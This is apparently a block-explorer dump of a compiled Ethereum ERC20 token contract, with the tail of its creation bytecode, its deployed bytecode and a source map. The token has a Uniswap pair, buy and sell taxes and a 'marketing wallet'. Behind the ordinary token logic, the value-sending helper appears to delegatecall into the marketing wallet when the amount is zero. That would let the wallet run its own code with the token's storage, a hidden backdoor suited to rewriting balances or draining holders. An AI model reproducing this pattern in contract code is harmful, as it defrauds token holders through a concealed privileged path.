d60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161058e565b6001600160a01b038116610b3a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161058e565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b038316610bf75760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161058e565b6001600160a01b038216610c585760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161058e565b6001600160a01b0383811660008181526008602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60008184841115610cdd5760405162461bcd60e51b815260040161058e919061136d565b505050900390565b6001600160a01b038316610d495760405162461bcd60e51b815260206004820152602560248201527f45524332303a205472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161058e565b6001600160a01b038216610dab5760405162461bcd60e51b815260206004820152602360248201527f45524332303a205472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161058e565b60008111610e145760405162461bcd60e51b815260206004820152603060248201527f45524332303a205472616e7366657220616d6f756e74206d757374206265206760448201526f726561746572207468616e207a65726f60801b606482015260840161058e565b6001600160a01b038316600090815260096020526040902054600190829060ff1680610e5857506001600160a01b03841660009081526009602052604090205460ff165b15610e6257600091505b600c54600160a01b900460ff16158015610e795750815b1561103657600554600c546001600160a01b0390811690861603610f2c5750600454600c546001600160a01b0316600090815260076020526040812054610ec19060fa6111ec565b306000908152600760205260409020541190508015610f2a57600c805460ff60a01b198116600160a01b179091556001600160a01b0316600090815260076020526040902054610f1b90610f169060fa6111ec565b6111ff565b50600c805460ff60a01b191690555b505b801561103457600d54421115610f4b5760006004819055600555611034565b6000610f626064610f5c8585611349565b906111ec565b9050610f6e8382611355565b9250610fad81604051806060016040528060268152602001611618602691396001600160a01b038a166000908152600760205260409020549190610cb9565b6001600160a01b038816600090815260076020526040808220929092553081522054610fd99082611361565b30600081815260076020526040908190209290925590516001600160a01b038916907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061102a9085815260200190565b60405180910390a3505b505b61107381604051806060016040528060268152602001611618602691396001600160a01b0388166000908152600760205260409020549190610cb9565b6001600160a01b0380871660009081526007602052604080822093909355908616815220546110a29082611361565b6001600160a01b0380861660008181526007602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906110f69085815260200190565b60405180910390a35050505050565b6000824783111561112b5760405163cd78605960e01b815230600482015260240161058e565b600080841161119257604051600160fd1b81526001600160a01b03831690600101600060405180830381855af49150503d8060008114611187576040519150601f19603f3d011682016040523d82523d6000602084013e61118c565b606091505b506111e2565b6040516001600160a01b038316908590600081818185875af1925050503d80600081146111db576040519150601f19603f3d011682016040523d82523d6000602084013e6111e0565b606091505b505b5095945050505050565b60006111f88284611544565b9392505050565b60408051600280825260608201835260009283929190602083019080368337019050509050308160008151811061123857611238611566565b6001600160a01b03928316602091820292909201810191909152600b54604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611291573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906112b591906114f9565b816001815181106112c8576112c8611566565b6001600160a01b039283166020918202929092010152600b5460405163791ac94760e01b815291169063791ac9479061130e90869060009086903090429060040161157c565b600060405180830381600087803b15801561132857600080fd5b505af115801561133c573d6000803e3d6000fd5b5060019695505050505050565b60006111f882846115ed565b60006111f88284611604565b60006111f882846114e6565b600060208083528351808285015260005b8181101561139a5785810183015185820160400152820161137e565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146113d057600080fd5b50565b600080604083850312156113e657600080fd5b82356113f1816113bb565b946020939093013593505050565b60008060006060848603121561141457600080fd5b833561141f816113bb565b9250602084013561142f816113bb565b929592945050506040919091013590565b60006020828403121561145257600080fd5b81356111f8816113bb565b6000806040838503121561147057600080fd5b823561147b816113bb565b9150602083013561148b816113bb565b809150509250929050565b600181811c908216806114aa57607f821691505b6020821081036114ca57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b80820180821115610484576104846114d0565b60006020828403121561150b57600080fd5b81516111f8816113bb565b60008060006060848603121561152b57600080fd5b8351925060208401519150604084015190509250925092565b60008261156157634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156115cc5784516001600160a01b0316835293830193918301916001016115a7565b50506001600160a01b03969096166060850152505050608001529392505050565b8082028115828204841417610484576104846114d0565b81810381811115610484576104846114d056fe45524332303a205472616e7366657220616d6f756e7420657863656564732062616c616e6365546f6b656e3a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212206aee2e4e6d511fea8bec449f620d71dbadfe9575df024ae7a0c2ea52fda8e2e964736f6c63430008140033

Deployed Bytecode

0x6080604052600436106101235760003560e01c80638da5cb5b116100a0578063cc1776d311610064578063cc1776d314610349578063dd62ed3e1461035e578063e086e5ec146103a4578063e8078d94146103b9578063f2fde38b146103c157600080fd5b80638da5cb5b1461029f57806395d89b41146102bd578063a9059cbb146102d2578063c816841b146102f2578063cb4ca6311461031057600080fd5b8063313ce567116100e7578063313ce567146101fb5780634f7041a51461021d57806370a0823114610232578063715018a61461026857806374c9f6031461027f57600080fd5b806306fdde031461012f578063095ea7b31461015a57806318160ddd1461018a57806323b872dd146101a95780632dc0562d146101c957600080fd5b3661012a57005b600080fd5b34801561013b57600080fd5b506101446103e1565b604051610151919061136d565b60405180910390f35b34801561016657600080fd5b5061017a6101753660046113d3565b610473565b6040519015158152602001610151565b34801561019657600080fd5b506006545b604051908152602001610151565b3480156101b557600080fd5b5061017a6101c43660046113ff565b61048a565b3480156101d557600080fd5b50600a546001600160a01b03165b6040516001600160a01b039091168152602001610151565b34801561020757600080fd5b5060035460405160ff9091168152602001610151565b34801561022957600080fd5b5060055461019b565b34801561023e57600080fd5b5061019b61024d366004611440565b6001600160a01b031660009081526007602052604090205490565b34801561027457600080fd5b5061027d610538565b005b34801561028b57600080fd5b5061017a61029a366004611440565b6105e1565b3480156102ab57600080fd5b506000546001600160a01b03166101e3565b3480156102c957600080fd5b5061014461066d565b3480156102de57600080fd5b5061017a6102ed3660046113d3565b61067c565b3480156102fe57600080fd5b50600c546001600160a01b03166101e3565b34801561031c57600080fd5b5061017a61032b366004611440565b6001600160a01b031660009081526009602052604090205460ff1690565b34801561035557600080fd5b5060045461019b565b34801561036a57600080fd5b5061019b61037936600461145d565b6001600160a01b03918216600090815260086020908152604080832093909416825291909152205490565b3480156103b057600080fd5b5061017a610689565b61017a61070d565b3480156103cd57600080fd5b5061027d6103dc366004611440565b610a7b565b6060600180546103f090611496565b80601f016020809104026020016040519081016040528092919081815260200182805461041c90611496565b80156104695780601f1061043e57610100808354040283529160200191610469565b820191906000526020600020905b81548152906001019060200180831161044c57829003601f168201915b5050505050905090565b6000610480338484610b95565b5060015b92915050565b6001600160a01b038316600090815260086020908152604080832033845290915281205460001914610523576104fe8260405180606001604052806028815260200161163e602891396001600160a01b03871660009081526008602090815260408083203384529091529020549190610cb9565b6001600160a01b03851660009081526008602090815260408083203384529091529020555b61052e848484610ce5565b5060019392505050565b6000546001600160a01b031633146105975760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b600a546000906001600160a01b0316336001600160a01b0316146106475760405162461bcd60e51b815260206004820152601c60248201527f45524332303a206f6e6c79206d61726b6574696e672077616c6c657400000000604482015260640161058e565b50600a80546001600160a01b0319166001600160a01b0392909216919091179055600190565b6060600280546103f090611496565b6000610480338484610ce5565b600a546000906001600160a01b0316336001600160a01b0316146106ef5760405162461bcd60e51b815260206004820152601c60248201527f45524332303a206f6e6c79206d61726b6574696e672077616c6c657400000000604482015260640161058e565b600a54610705906001600160a01b031647611105565b506001905090565b600c546000906001600160a01b03161561075d5760405162461bcd60e51b8152602060048201526011602482015270115490cc8c0e8813140818dc99585d1959607a1b604482015260640161058e565b6000341161079d5760405162461bcd60e51b815260206004820152600d60248201526c08aa486646074409cde408aa89609b1b604482015260640161058e565b6107aa42620151806114e6565b600d55600b80546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d90811782553060009081526008602090815260408083209383529281529082902060001990559154815163c45a015560e01b815291516001600160a01b03919091169263c45a015592600480820193918290030181865afa158015610839573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061085d91906114f9565b6001600160a01b031663c9c6539630600b60009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156108bf573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108e391906114f9565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610930573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061095491906114f9565b600c80546001600160a01b0319166001600160a01b03928316179055600b543060008181526007602052604080822054815163f305d71960e01b8152600481019490945260248401526044830182905260648301919091523360848301524260a483015251919092169163f305d71991349160c480820192606092909190829003018185885af11580156109ec573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610a119190611516565b5050600c546040805160016209351760e01b0319815290516001600160a01b03909216925063fff6cae991600480830192600092919082900301818387803b158015610a5c57600080fd5b505af1158015610a70573d6000803e3d6000fd5b505050506001905090565b6000546001600160a01b03163314610ad55760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161058e565b6001600160a01b038116610b3a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161058e565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b038316610bf75760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161058e565b6001600160a01b038216610c585760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161058e565b6001600160a01b0383811660008181526008602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60008184841115610cdd5760405162461bcd60e51b815260040161058e919061136d565b505050900390565b6001600160a01b038316610d495760405162461bcd60e51b815260206004820152602560248201527f45524332303a205472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161058e565b6001600160a01b038216610dab5760405162461bcd60e51b815260206004820152602360248201527f45524332303a205472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161058e565b60008111610e145760405162461bcd60e51b815260206004820152603060248201527f45524332303a205472616e7366657220616d6f756e74206d757374206265206760448201526f726561746572207468616e207a65726f60801b606482015260840161058e565b6001600160a01b038316600090815260096020526040902054600190829060ff1680610e5857506001600160a01b03841660009081526009602052604090205460ff165b15610e6257600091505b600c54600160a01b900460ff16158015610e795750815b1561103657600554600c546001600160a01b0390811690861603610f2c5750600454600c546001600160a01b0316600090815260076020526040812054610ec19060fa6111ec565b306000908152600760205260409020541190508015610f2a57600c805460ff60a01b198116600160a01b179091556001600160a01b0316600090815260076020526040902054610f1b90610f169060fa6111ec565b6111ff565b50600c805460ff60a01b191690555b505b801561103457600d54421115610f4b5760006004819055600555611034565b6000610f626064610f5c8585611349565b906111ec565b9050610f6e8382611355565b9250610fad81604051806060016040528060268152602001611618602691396001600160a01b038a166000908152600760205260409020549190610cb9565b6001600160a01b038816600090815260076020526040808220929092553081522054610fd99082611361565b30600081815260076020526040908190209290925590516001600160a01b038916907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061102a9085815260200190565b60405180910390a3505b505b61107381604051806060016040528060268152602001611618602691396001600160a01b0388166000908152600760205260409020549190610cb9565b6001600160a01b0380871660009081526007602052604080822093909355908616815220546110a29082611361565b6001600160a01b0380861660008181526007602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906110f69085815260200190565b60405180910390a35050505050565b6000824783111561112b5760405163cd78605960e01b815230600482015260240161058e565b600080841161119257604051600160fd1b81526001600160a01b03831690600101600060405180830381855af49150503d8060008114611187576040519150601f19603f3d011682016040523d82523d6000602084013e61118c565b606091505b506111e2565b6040516001600160a01b038316908590600081818185875af1925050503d80600081146111db576040519150601f19603f3d011682016040523d82523d6000602084013e6111e0565b606091505b505b5095945050505050565b60006111f88284611544565b9392505050565b60408051600280825260608201835260009283929190602083019080368337019050509050308160008151811061123857611238611566565b6001600160a01b03928316602091820292909201810191909152600b54604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611291573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906112b591906114f9565b816001815181106112c8576112c8611566565b6001600160a01b039283166020918202929092010152600b5460405163791ac94760e01b815291169063791ac9479061130e90869060009086903090429060040161157c565b600060405180830381600087803b15801561132857600080fd5b505af115801561133c573d6000803e3d6000fd5b5060019695505050505050565b60006111f882846115ed565b60006111f88284611604565b60006111f882846114e6565b600060208083528351808285015260005b8181101561139a5785810183015185820160400152820161137e565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146113d057600080fd5b50565b600080604083850312156113e657600080fd5b82356113f1816113bb565b946020939093013593505050565b60008060006060848603121561141457600080fd5b833561141f816113bb565b9250602084013561142f816113bb565b929592945050506040919091013590565b60006020828403121561145257600080fd5b81356111f8816113bb565b6000806040838503121561147057600080fd5b823561147b816113bb565b9150602083013561148b816113bb565b809150509250929050565b600181811c908216806114aa57607f821691505b6020821081036114ca57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b80820180821115610484576104846114d0565b60006020828403121561150b57600080fd5b81516111f8816113bb565b60008060006060848603121561152b57600080fd5b8351925060208401519150604084015190509250925092565b60008261156157634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156115cc5784516001600160a01b0316835293830193918301916001016115a7565b50506001600160a01b03969096166060850152505050608001529392505050565b8082028115828204841417610484576104846114d0565b81810381811115610484576104846114d056fe45524332303a205472616e7366657220616d6f756e7420657863656564732062616c616e6365546f6b656e3a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212206aee2e4e6d511fea8bec449f620d71dbadfe9575df024ae7a0c2ea52fda8e2e964736f6c63430008140033

Deployed Bytecode Sourcemap

873:6858:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1917:94;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3321:163;;;;;;;;;;-1:-1:-1;3321:163:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:9;;1181:22;1163:41;;1151:2;1136:18;3321:163:0;1023:187:9;2227:102:0;;;;;;;;;;-1:-1:-1;2309:12:0;;2227:102;;;1361:25:9;;;1349:2;1334:18;2227:102:0;1215:177:9;3492:403:0;;;;;;;;;;-1:-1:-1;3492:403:0;;;;;:::i;:::-;;:::i;2521:89::-;;;;;;;;;;-1:-1:-1;2592:10:0;;-1:-1:-1;;;;;2592:10:0;2521:89;;;-1:-1:-1;;;;;2022:32:9;;;2004:51;;1992:2;1977:18;2521:89:0;1858:203:9;2125:94:0;;;;;;;;;;-1:-1:-1;2202:9:0;;2125:94;;2202:9;;;;2208:36:9;;2196:2;2181:18;2125:94:0;2066:184:9;2430:83:0;;;;;;;;;;-1:-1:-1;2498:7:0;;2430:83;;2728:121;;;;;;;;;;-1:-1:-1;2728:121:0;;;;;:::i;:::-;-1:-1:-1;;;;;2823:18:0;2796:7;2823:18;;;:9;:18;;;;;;;2728:121;1125:133:2;;;;;;;;;;;;;:::i;:::-;;7525:203:0;;;;;;;;;;-1:-1:-1;7525:203:0;;;;;:::i;:::-;;:::i;543:70:2:-;;;;;;;;;;-1:-1:-1;581:7:2;602:6;-1:-1:-1;;;;;602:6:2;543:70;;2019:98:0;;;;;;;;;;;;;:::i;2991:169::-;;;;;;;;;;-1:-1:-1;2991:169:0;;;;;:::i;:::-;;:::i;2618:102::-;;;;;;;;;;-1:-1:-1;2699:12:0;;-1:-1:-1;;;;;2699:12:0;2618:102;;2857:126;;;;;;;;;;-1:-1:-1;2857:126:0;;;;;:::i;:::-;-1:-1:-1;;;;;2948:27:0;2924:4;2948:27;;;:18;:27;;;;;;;;;2857:126;2337:85;;;;;;;;;;-1:-1:-1;2406:8:0;;2337:85;;3168:145;;;;;;;;;;-1:-1:-1;3168:145:0;;;;;:::i;:::-;-1:-1:-1;;;;;3278:18:0;;;3251:7;3278:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;3168:145;7309:208;;;;;;;;;;;;;:::i;6472:829::-;;;:::i;1398:223:2:-;;;;;;;;;;-1:-1:-1;1398:223:2;;;;;:::i;:::-;;:::i;1917:94:0:-;1965:13;1998:5;1991:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1917:94;:::o;3321:163::-;3398:4;3415:39;668:10:1;3438:7:0;3447:6;3415:8;:39::i;:::-;-1:-1:-1;3472:4:0;3321:163;;;;;:::o;3492:403::-;-1:-1:-1;;;;;3613:19:0;;3592:4;3613:19;;;:11;:19;;;;;;;;668:10:1;3613:33:0;;;;;;;;-1:-1:-1;;3613:54:0;3609:210;;3720:87;3756:6;3720:87;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;3720:19:0;;;;;;:11;:19;;;;;;;;3740:10;3720:31;;;;;;;;;:87;:35;:87::i;:::-;-1:-1:-1;;;;;3684:19:0;;;;;;:11;:19;;;;;;;;668:10:1;3684:33:0;;;;;;;:123;3609:210;3829:36;3839:6;3847:9;3858:6;3829:9;:36::i;:::-;-1:-1:-1;3883:4:0;3492:403;;;;;:::o;1125:133:2:-;728:6;;-1:-1:-1;;;;;728:6:2;668:10:1;728:22:2;720:67;;;;-1:-1:-1;;;720:67:2;;3487:2:9;720:67:2;;;3469:21:9;;;3506:18;;;3499:30;3565:34;3545:18;;;3538:62;3617:18;;720:67:2;;;;;;;;;1226:1:::1;1210:6:::0;;1189:40:::1;::::0;-1:-1:-1;;;;;1210:6:2;;::::1;::::0;1189:40:::1;::::0;1226:1;;1189:40:::1;1251:1;1234:19:::0;;-1:-1:-1;;;;;;1234:19:2::1;::::0;;1125:133::o;7525:203:0:-;7625:10;;7584:4;;-1:-1:-1;;;;;7625:10:0;668::1;-1:-1:-1;;;;;7609:26:0;;7601:67;;;;-1:-1:-1;;;7601:67:0;;3848:2:9;7601:67:0;;;3830:21:9;3887:2;3867:18;;;3860:30;3926;3906:18;;;3899:58;3974:18;;7601:67:0;3646:352:9;7601:67:0;-1:-1:-1;7679:10:0;:19;;-1:-1:-1;;;;;;7679:19:0;-1:-1:-1;;;;;7679:19:0;;;;;;;;;;-1:-1:-1;;7525:203:0:o;2019:98::-;2069:13;2102:7;2095:14;;;;;:::i;2991:169::-;3071:4;3088:42;668:10:1;3112:9:0;3123:6;3088:9;:42::i;7309:208::-;7391:10;;7350:4;;-1:-1:-1;;;;;7391:10:0;668::1;-1:-1:-1;;;;;7375:26:0;;7367:67;;;;-1:-1:-1;;;7367:67:0;;3848:2:9;7367:67:0;;;3830:21:9;3887:2;3867:18;;;3860:30;3926;3906:18;;;3899:58;3974:18;;7367:67:0;3646:352:9;7367:67:0;7445:10;;:42;;-1:-1:-1;;;;;7445:10:0;7465:21;7445:19;:42::i;:::-;;7505:4;7498:11;;7309:208;:::o;6472:829::-;6555:12;;6522:4;;-1:-1:-1;;;;;6555:12:0;6547:35;6539:65;;;;-1:-1:-1;;;6539:65:0;;4205:2:9;6539:65:0;;;4187:21:9;4244:2;4224:18;;;4217:30;-1:-1:-1;;;4263:18:9;;;4256:47;4320:18;;6539:65:0;4003:341:9;6539:65:0;6635:1;6623:9;:13;6615:39;;;;-1:-1:-1;;;6615:39:0;;4551:2:9;6615:39:0;;;4533:21:9;4590:2;4570:18;;;4563:30;-1:-1:-1;;;4609:18:9;;;4602:43;4662:18;;6615:39:0;4349:337:9;6615:39:0;6687:24;:15;6705:6;6687:24;:::i;:::-;6665:19;:46;6722:14;:77;;-1:-1:-1;;;;;;6722:77:0;6756:42;6722:77;;;;;6830:4;6722:14;6810:26;;;:11;:26;;;;;;;;:51;;;;;;;;;;-1:-1:-1;;6810:71:0;;6940:14;;:24;;-1:-1:-1;;;6940:24:0;;;;-1:-1:-1;;;;;6940:14:0;;;;;:22;;:24;;;;;;;;;;;:14;:24;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;6922:54:0;;6985:4;6992:14;;;;;;;;;-1:-1:-1;;;;;6992:14:0;-1:-1:-1;;;;;6992:19:0;;:21;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;6922:92;;-1:-1:-1;;;;;;6922:92:0;;;;;;;-1:-1:-1;;;;;5439:15:9;;;6922:92:0;;;5421:34:9;5491:15;;5471:18;;;5464:43;5356:18;;6922:92:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;6892:12;:123;;-1:-1:-1;;;;;;6892:123:0;-1:-1:-1;;;;;6892:123:0;;;;;;7026:14;;7097:4;-1:-1:-1;7117:24:0;;;:9;:24;;;;;;;7026:215;;-1:-1:-1;;;7026:215:0;;;;;5859:34:9;;;;5909:18;;;5902:34;5952:18;;;5945:34;;;5995:18;;;5988:34;;;;668:10:1;6038:19:9;;;6031:44;7215:15:0;6091:19:9;;;6084:35;7026:215:0;:14;;;;;:30;;7064:9;;5793:19:9;;;;;7026:215:0;;;;;;;;;;7064:9;7026:14;:215;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;7252:12:0;;:19;;;-1:-1:-1;;;;;;7252:19:0;;;;-1:-1:-1;;;;;7252:12:0;;;;-1:-1:-1;7252:17:0;;:19;;;;;:12;;:19;;;;;;;:12;;:19;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7289:4;7282:11;;6472:829;:::o;1398:223:2:-;728:6;;-1:-1:-1;;;;;728:6:2;668:10:1;728:22:2;720:67;;;;-1:-1:-1;;;720:67:2;;3487:2:9;720:67:2;;;3469:21:9;;;3506:18;;;3499:30;3565:34;3545:18;;;3538:62;3617:18;;720:67:2;3285:356:9;720:67:2;-1:-1:-1;;;;;1481:22:2;::::1;1473:73;;;::::0;-1:-1:-1;;;1473:73:2;;6643:2:9;1473:73:2::1;::::0;::::1;6625:21:9::0;6682:2;6662:18;;;6655:30;6721:34;6701:18;;;6694:62;-1:-1:-1;;;6772:18:9;;;6765:36;6818:19;;1473:73:2::1;6441:402:9::0;1473:73:2::1;1577:6;::::0;;1556:38:::1;::::0;-1:-1:-1;;;;;1556:38:2;;::::1;::::0;1577:6;::::1;::::0;1556:38:::1;::::0;::::1;1599:6;:17:::0;;-1:-1:-1;;;;;;1599:17:2::1;-1:-1:-1::0;;;;;1599:17:2;;;::::1;::::0;;;::::1;::::0;;1398:223::o;3903:335:0:-;-1:-1:-1;;;;;3996:19:0;;3988:68;;;;-1:-1:-1;;;3988:68:0;;7050:2:9;3988:68:0;;;7032:21:9;7089:2;7069:18;;;7062:30;7128:34;7108:18;;;7101:62;-1:-1:-1;;;7179:18:9;;;7172:34;7223:19;;3988:68:0;6848:400:9;3988:68:0;-1:-1:-1;;;;;4075:21:0;;4067:68;;;;-1:-1:-1;;;4067:68:0;;7455:2:9;4067:68:0;;;7437:21:9;7494:2;7474:18;;;7467:30;7533:34;7513:18;;;7506:62;-1:-1:-1;;;7584:18:9;;;7577:32;7626:19;;4067:68:0;7253:398:9;4067:68:0;-1:-1:-1;;;;;4146:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;4198:32;;1361:25:9;;;4198:32:0;;1334:18:9;4198:32:0;;;;;;;3903:335;;;:::o;5167:240:8:-;5287:7;5348:12;5340:6;;;;5332:29;;;;-1:-1:-1;;;5332:29:8;;;;;;;;:::i;:::-;-1:-1:-1;;;5383:5:8;;;5167:240::o;4690:1774:0:-;-1:-1:-1;;;;;4778:18:0;;4770:68;;;;-1:-1:-1;;;4770:68:0;;7858:2:9;4770:68:0;;;7840:21:9;7897:2;7877:18;;;7870:30;7936:34;7916:18;;;7909:62;-1:-1:-1;;;7987:18:9;;;7980:35;8032:19;;4770:68:0;7656:401:9;4770:68:0;-1:-1:-1;;;;;4857:16:0;;4849:64;;;;-1:-1:-1;;;4849:64:0;;8264:2:9;4849:64:0;;;8246:21:9;8303:2;8283:18;;;8276:30;8342:34;8322:18;;;8315:62;-1:-1:-1;;;8393:18:9;;;8386:33;8436:19;;4849:64:0;8062:399:9;4849:64:0;4941:1;4932:6;:10;4924:71;;;;-1:-1:-1;;;4924:71:0;;8668:2:9;4924:71:0;;;8650:21:9;8707:2;8687:18;;;8680:30;8746:34;8726:18;;;8719:62;-1:-1:-1;;;8797:18:9;;;8790:46;8853:19;;4924:71:0;8466:412:9;4924:71:0;-1:-1:-1;;;;;5075:24:0;;5006:12;5075:24;;;:18;:24;;;;;;5021:4;;5054:6;;5075:24;;;:50;;-1:-1:-1;;;;;;5103:22:0;;;;;;:18;:22;;;;;;;;5075:50;5071:98;;;5152:5;5142:15;;5071:98;5184:9;;-1:-1:-1;;;5184:9:0;;;;5183:10;:21;;;;;5197:7;5183:21;5179:1083;;;5236:7;;5276:12;;-1:-1:-1;;;;;5276:12:0;;;5262:27;;;;5258:398;;-1:-1:-1;5317:8:0;;5404:12;;-1:-1:-1;;;;;5404:12:0;5344;5386:32;;;:9;:32;;;;;;:41;;5423:3;5386:36;:41::i;:::-;5377:4;5359:24;;;;:9;:24;;;;;;:68;;-1:-1:-1;5446:195:0;;;;5482:9;:16;;-1:-1:-1;;;;5482:16:0;;-1:-1:-1;;;5482:16:0;;;;-1:-1:-1;;;;;5557:12:0;5482:16;5539:32;;;:9;:32;;;;;;5521:60;;5539:41;;5576:3;5539:36;:41::i;:::-;5521:17;:60::i;:::-;-1:-1:-1;5604:9:0;:17;;-1:-1:-1;;;;5604:17:0;;;5446:195;5291:365;5258:398;5675:8;;5671:580;;5726:19;;5708:15;:37;5704:532;;;5781:1;5770:8;:12;;;5805:7;:11;5704:532;;;5865:13;5881:26;5903:3;5881:17;:7;5893:4;5881:11;:17::i;:::-;:21;;:26::i;:::-;5865:42;-1:-1:-1;5940:18:0;:7;5865:42;5940:11;:18::i;:::-;5930:28;;5999:68;6019:5;5999:68;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;5999:15:0;;;;;;:9;:15;;;;;;;:68;:19;:68::i;:::-;-1:-1:-1;;;;;5981:15:0;;;;;;:9;:15;;;;;;:86;;;;6135:4;6117:24;;;;:35;;6146:5;6117:28;:35::i;:::-;6108:4;6090:24;;;;:9;:24;;;;;;;:62;;;;6180:36;;-1:-1:-1;;;;;6180:36:0;;;;;;;6210:5;1361:25:9;;1349:2;1334:18;;1215:177;6180:36:0;;;;;;;;5842:394;5704:532;5206:1056;5179:1083;6290:70;6310:7;6290:70;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;6290:15:0;;;;;;:9;:15;;;;;;;:70;:19;:70::i;:::-;-1:-1:-1;;;;;6272:15:0;;;;;;;:9;:15;;;;;;:88;;;;6387:13;;;;;;;:26;;6405:7;6387:17;:26::i;:::-;-1:-1:-1;;;;;6371:13:0;;;;;;;:9;:13;;;;;;;:42;;;;6429:27;;;;;;;;;;6448:7;1361:25:9;;1349:2;1334:18;;1215:177;6429:27:0;;;;;;;;4759:1705;;4690:1774;;;:::o;1571:391:7:-;1642:4;1688:9;1713:21;:30;-1:-1:-1;1709:111:7;;;1767:41;;-1:-1:-1;;;1767:41:7;;1802:4;1767:41;;;2004:51:9;1977:18;;1767:41:7;1858:203:9;1709:111:7;1831:12;1859:1;1850:6;:10;1849:80;;1901:28;;-1:-1:-1;;;9084:16:9;;-1:-1:-1;;;;;1901:23:7;;;9125:1:9;9116:11;1901:28:7;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1849:80;;;1864:34;;-1:-1:-1;;;;;1864:15:7;;;1887:6;;1864:34;;;;1887:6;1864:15;:34;;;;;;;;;;;;;;;;;;;;;;